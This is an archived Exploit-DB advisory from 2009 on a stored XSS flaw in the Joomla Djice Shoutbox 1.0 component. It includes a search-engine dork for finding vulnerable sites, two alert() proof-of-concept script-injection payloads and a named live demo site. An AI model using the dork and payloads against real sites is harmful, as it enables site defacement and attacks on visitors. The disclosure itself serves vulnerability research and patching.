exploit-db-mirror/exploits/php/webapps/8197.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

25 lines
No EOL
603 B
Text

############################################
# Joomla Djice Shoutbox v 1.0 <= Permanent XSS vulnerability #
############################################
- dork: inurl:"index.php?option=com_djiceshoutbox"
The script is affected by Permanent XSS vulnerability, so yuo can put in bad java script code like:
"><script>alert('XaDoS')</script>
or
'">><script>alert('XSS By XaDoS')</script>
the XSS become permanent in every page of site!
not critical damage but it's not funny..
[+] D3M0:
http://www.djiceatwork.com
contact me at xados @ hotmail . it
www.securitycode.it
# milw0rm.com [2009-03-10]